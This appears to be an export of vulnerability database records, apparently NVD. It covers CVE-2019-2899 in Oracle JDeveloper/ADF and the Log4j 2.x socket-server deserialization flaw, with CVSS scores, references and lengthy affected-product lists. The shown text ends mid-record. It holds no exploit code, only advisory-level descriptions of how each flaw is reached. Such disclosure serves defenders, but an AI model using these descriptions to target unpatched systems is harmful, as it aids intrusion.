Vulnerability in the Oracle JDeveloper and ADF product of Oracle Fusion Middleware (component: OAM). Supported versions that are affected are 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data. CVSS 3.0 Base Score 2.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).
References
| ▼ | URL | Tags | |
|---|---|---|---|
| secalert_us@oracle.com | http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html | Patch, Vendor Advisory | |
| secalert_us@oracle.com | https://www.oracle.com/security-alerts/cpuapr2020.html | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.oracle.com/security-alerts/cpuapr2020.html | Patch, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| oracle | application_development_framework | 11.1.1.9.0 | |
| oracle | application_development_framework | 11.1.2.4.0 | |
| oracle | application_development_framework | 12.1.3.0.0 | |
| oracle | application_development_framework | 12.2.1.3.0 | |
| oracle | jdeveloper | 11.1.1.9.0 | |
| oracle | jdeveloper | 11.1.2.4.0 | |
| oracle | jdeveloper | 12.1.3.0.0 | |
| oracle | jdeveloper | 12.2.1.3.0 | |
| oracle | hyperion_financial_management | 11.1.2.4 | |
| oracle | peoplesoft_enterprise_scm_purchasing | 9.2 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:application_development_framework:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A5A9C82D-8EFF-4779-9B09-F32D1AC6809E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_development_framework:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "EAE404A6-D8A9-48AE-B906-23F1F4A8D508", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_development_framework:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B25C242F-9D34-4253-ABA2-6445B0E1E61F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_development_framework:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "8FA6E182-D9C6-4F97-A51F-CD6A19138BAD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "2B70A973-A5C5-4E51-B93C-C22888E24FF1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:hyperion_financial_management:11.1.2.4:*:*:*:*:*:*:*", matchCriteriaId: "49706536-CE9B-4713-8460-CC961B50C341", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_scm_purchasing:9.2:*:*:*:*:*:*:*", matchCriteriaId: "AFD1EE51-F556-49EE-BDF9-5C189D13F2CD", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper and ADF product of Oracle Fusion Middleware (component: OAM). Supported versions that are affected are 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data. CVSS 3.0 Base Score 2.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).", }, { lang: "es", value: "Una vulnerabilidad en el producto Oracle JDeveloper and ADF de Oracle Fusion Middleware (componente: OAM). Las versiones compatibles que están afectadas son 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 y 12.2.1.3.0. Una vulnerabilidad fácilmente explotable permite a un atacante muy privilegiado con acceso a la red por medio de HTTP comprometer a Oracle JDeveloper and ADF. Los ataques con éxito requieren la interacción humana de otra persona diferente del atacante. Los ataques con éxito de esta vulnerabilidad pueden resultar en un acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle JDeveloper and ADF. CVSS 3.0 Puntuación Base 2.4 (Impactos de la Confidencialidad). Vector CVSS: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).", }, ], id: "CVE-2019-2899", lastModified: "2024-11-21T04:41:45.893", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "SINGLE", availabilityImpact: "NONE", baseScore: 3.5, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:N/AC:M/Au:S/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 6.8, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 2.4, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "HIGH", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", version: "3.0", }, exploitabilityScore: 0.9, impactScore: 1.4, source: "secalert_us@oracle.com", type: "Secondary", }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 2.4, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "HIGH", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", version: "3.1", }, exploitabilityScore: 0.9, impactScore: 1.4, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-10-16T18:15:27.247", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2017-04-17 21:59
Modified
2025-04-20 01:37
Severity ?
Summary
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "A364B542-9D74-48AD-9616-8F16107B3F9C", versionEndExcluding: "2.8.2", versionStartIncluding: "2.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", matchCriteriaId: "5EC98B22-FFAA-4B59-8E63-EBAA4336AD13", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", matchCriteriaId: "F1BE6C1F-2565-4E97-92AA-16563E5660A5", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", matchCriteriaId: "5735E553-9731-4AAC-BCFF-989377F817B3", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", matchCriteriaId: "7081652A-D28B-494E-94EF-CA88117F23EE", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", matchCriteriaId: "7B7A6697-98CC-4E36-93DB-B7160F8399F9", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:fuse:1.0:*:*:*:*:*:*:*", matchCriteriaId: "077732DB-F5F3-4E9C-9AC0-8142AB85B32F", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", matchCriteriaId: "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*", matchCriteriaId: "84FF61DF-D634-4FB5-8DF1-01F631BE1A7A", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", matchCriteriaId: "142AD0DD-4CF3-4D74-9442-459CE3347E3A", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.3:*:*:*:*:*:*:*", matchCriteriaId: "B99A2411-7F6A-457F-A7BF-EB13C630F902", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.4:*:*:*:*:*:*:*", matchCriteriaId: "041F9200-4C01-4187-AE34-240E8277B54D", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.5:*:*:*:*:*:*:*", matchCriteriaId: "4EB48767-F095-444F-9E05-D9AC345AB803", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*", matchCriteriaId: "5F6FA12B-504C-4DBF-A32E-0548557AA2ED", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", matchCriteriaId: "33C068A4-3780-4EAB-A937-6082DF847564", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", matchCriteriaId: "51EF4996-72F4-4FA4-814F-F5991E7A8318", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", matchCriteriaId: "D99A687E-EAE6-417E-A88E-D0082BC194CD", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", matchCriteriaId: "B353CE99-D57C-465B-AAB0-73EF581127D1", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", matchCriteriaId: "9EC0D196-F7B8-4BDD-9050-779F7A7FBEE4", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", matchCriteriaId: "A4E9DD8A-A68B-4A69-8B01-BFF92A2020A8", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", matchCriteriaId: "BF77CDCF-B9C9-427D-B2BF-36650FB2148C", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", matchCriteriaId: "D5F7E11E-FB34-4467-8919-2B6BEAABF665", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", matchCriteriaId: "B76AA310-FEC7-497F-AF04-C3EC1E76C4CC", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", matchCriteriaId: "825ECE2D-E232-46E0-A047-074B34DB1E97", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "A5553591-073B-45E3-999F-21B8BA2EEE22", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6FAA9FFE-8F55-4E81-B62F-A5500468AD30", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.1:*:*:*:*:*:*:*", matchCriteriaId: "C41B952C-B6FD-4244-BEEE-A1EB73503594", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "3D8D08B8-CE61-45A3-BAC2-6D0E7D567B68", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "C83DA9A0-2EBC-4298-8412-1A7C4DC88C2B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9DC56004-4497-4CDD-AE76-5E3DFAE170F0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "274A0CF5-41E8-42E0-9931-F7372A65B9C4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_converged_application_server_-_service_controller:6.1:*:*:*:*:*:*:*", matchCriteriaId: "66DCCCD9-2170-4675-A447-FB679BC28A74", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "FD945A04-174C-46A2-935D-4F92631D1018", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:*", matchCriteriaId: "9D5F8F04-7DFB-4B44-90CF-F1372DB8313C", versionEndIncluding: "6.2", versionStartIncluding: "6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:*:*:*:*:*:*:*:*", matchCriteriaId: "A53B6FD8-8367-4915-B4D0-23572F31C539", versionEndExcluding: "8.0.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:*:*:*:*:*:*:*:*", matchCriteriaId: "ABD748C9-24F6-4739-9772-208B98616EE2", versionEndIncluding: "7.3.6", versionStartIncluding: "7.3.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_online_mediation_controller:6.1:*:*:*:*:*:*:*", matchCriteriaId: "15817206-C2AD-47B7-B40F-85BB36DB4E78", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_pricing_design_center:11.1:*:*:*:*:*:*:*", matchCriteriaId: "F6C9F582-6C82-4994-9724-22E9575E48B0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_pricing_design_center:12.0:*:*:*:*:*:*:*", matchCriteriaId: "49BB6E9C-B630-4BDC-AEC1-7F031F612D6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_service_broker:6.0:*:*:*:*:*:*:*", matchCriteriaId: "373C4024-679F-4C37-B408-0FB0D7FD845F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "77120A3C-9A48-45FC-A620-5072AF325ACF", versionEndExcluding: "7.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.2:*:*:*:*:*:*:*", matchCriteriaId: "8A76F09D-AF43-426B-A04F-79E1CAC51D03", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.5:*:*:*:*:*:*:*", matchCriteriaId: "F5B5E83F-D4FD-4ABB-9B8E-97C0E7571AA5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", matchCriteriaId: "9D03A8C9-35A5-4B75-9711-7A4A60457307", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_data_quality:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "36CF85A9-2C29-46E7-961E-8ADD0B5822CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5:*:*:*:*:*:*:*", matchCriteriaId: "36E39918-B2D6-43F0-A607-8FD8BFF6F340", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "1FEB8446-7EAC-4A8D-B6EE-3AAC2294C324", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5:*:*:*:*:*:*:*", matchCriteriaId: "14480702-4398-4C28-82A6-E7329FB3B650", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:13.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6F4E0F9A-D925-43FB-A1B7-452EEAE6BE2D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_mysql_database:*:*:*:*:*:*:*:*", matchCriteriaId: "C2239009-34CE-4E54-992B-835649C9D96F", versionEndIncluding: "13.2.2.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:12.1.0.8:*:*:*:*:*:*:*", matchCriteriaId: "41650E24-8BFD-42F0-A3E2-545118602690", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "C5AFC807-4873-42B3-AEDE-8633A9BDDEF2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "2E3D0D69-6AFF-49DD-9BB4-5C0C6905D14E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.2.1.1:*:*:*:*:*:*:*", matchCriteriaId: "532955A8-7292-4662-9324-C961587C8657", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "6E3469D7-69E4-4242-B45A-C0CD9E691C4A", versionEndIncluding: "7.3.3.0.2", versionStartIncluding: "7.3.3.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "1D94C05C-7403-47D3-98D8-2DA8373FEE6F", versionEndIncluding: "8.0.7.0.0", versionStartIncluding: "8.0.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "46E31100-478A-480C-9518-A6D8FBB94B8B", versionEndIncluding: "8.0.4.0.0", versionStartIncluding: "8.0.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:6.1.1:*:*:*:*:*:*:*", matchCriteriaId: "48D8CC72-A67A-4CB0-948D-53488ACC7826", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "8DECBF5C-6C87-424F-A116-DD534EC5946C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "3469C84E-50F3-4461-864C-E59174DDC981", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_lending_and_leasing:*:*:*:*:*:*:*:*", matchCriteriaId: "2959030B-A9B7-4423-A2E8-9352FC83C4A2", versionEndIncluding: "14.8.0", versionStartIncluding: "14.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_lending_and_leasing:12.5.0:*:*:*:*:*:*:*", matchCriteriaId: "317CA916-61F3-4E24-B42F-610A1C88A5BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "4E7791EF-A99D-4D52-AFC7-157372E88E21", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "265B796B-2DDA-43A6-A3A9-1A79676F25C2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:*", matchCriteriaId: "D4279644-04B8-4E58-A38D-CD1E4FB1C39C", versionEndIncluding: "8.0.7.0.0", versionStartIncluding: "8.0.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:6.1.1:*:*:*:*:*:*:*", matchCriteriaId: "43422E17-1D41-497E-A60B-31B1B4D6D563", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_with_agilereporter:8.0.9.2.0:*:*:*:*:*:*:*", matchCriteriaId: "C9C146BA-6F4F-4A6F-8E53-8A4F5B8E15D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.0.4:*:*:*:*:*:*:*", matchCriteriaId: "B0A34DF8-72CC-4A8E-84F2-C2DF4A0B9FAB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "21BE77B2-6368-470E-B9E6-21664D9A818A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*", matchCriteriaId: "3250073F-325A-4AFC-892F-F2005E3854A5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*", matchCriteriaId: "0DDDC9C2-33D6-4123-9ABC-C9B809A6E88E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*", matchCriteriaId: "991A279B-9D7C-4E39-8827-BC21C2C03B83", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.2:*:*:*:*:*:*:*", matchCriteriaId: "D151B58F-5583-4F19-B225-80075B45441B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3:*:*:*:*:*:*:*", matchCriteriaId: "C7D665C9-408A-4039-A2D4-9EE565BC4656", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:goldengate:12.3.2.1.1:*:*:*:*:*:*:*", matchCriteriaId: "65B765DA-560B-4367-B9B0-B7369BC4D3DC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:goldengate_application_adapters:12.3.2.1.1:*:*:*:*:*:*:*", matchCriteriaId: "CECECC34-8112-4328-BA49-39F30BE7874A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_analytics:11.1.1.5.8:*:*:*:*:*:*:*", matchCriteriaId: "B4855252-D6CA-461D-B196-30AFA7482868", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:11.1.2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "7A79A489-F37C-420A-83B1-4482A8DFF9BB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager_connector:9.0:*:*:*:*:*:*:*", matchCriteriaId: "E8BD581B-1CC0-4236-836A-204BBCBBBF77", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "16BBC649-7AA8-4B8E-9A3F-CC62948F0102", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "289702F6-1CC4-4D88-9745-EB0FA68A732B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:*:*:*:*:*:*:*:*", matchCriteriaId: "9A74FD5F-4FEA-4A74-8B92-72DFDE6BA464", versionEndIncluding: "17.3", versionStartIncluding: "17.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.1:*:*:*:*:*:*:*", matchCriteriaId: "CEE4B2F0-1AAB-4A1F-AE86-A568D43891B3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.1:*:*:*:*:*:*:*", matchCriteriaId: "C79B50C2-27C2-4A9C-ACEE-B70015283F58", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration:10.0:*:*:*:*:*:*:*", matchCriteriaId: "9ED4F724-C92F-4B4F-B631-81A4EA706DB2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration:10.1:*:*:*:*:*:*:*", matchCriteriaId: "900450EB-A71D-4A8E-B8C4-AFD36F9A36B0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration:10.2:*:*:*:*:*:*:*", matchCriteriaId: "68017B52-6597-4E32-A38F-634B5635568C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration:11.0:*:*:*:*:*:*:*", matchCriteriaId: "A19D11A6-BA1D-4121-8686-C177C450777F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", matchCriteriaId: "DB6321F8-7A0A-4DB8-9889-3527023C652A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", matchCriteriaId: "25F8E604-8180-4728-AD2D-7FF034E3E65A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", matchCriteriaId: "02867DC7-E669-43C0-ACC4-E1CAA8B9994C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", matchCriteriaId: "FBAFA631-C92B-4FF7-8E65-07C67789EBCD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.1:*:*:*:*:*:*:*", matchCriteriaId: "9652104A-119D-4327-A937-8BED23C23861", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:4.0.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A055CAA6-F789-4E63-A212-84DBAC4BF044", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", matchCriteriaId: "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "48D04F3B-A385-4D8C-BD05-53006452346A", versionEndIncluding: "3.4.7.4297", versionStartIncluding: "3.4.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", 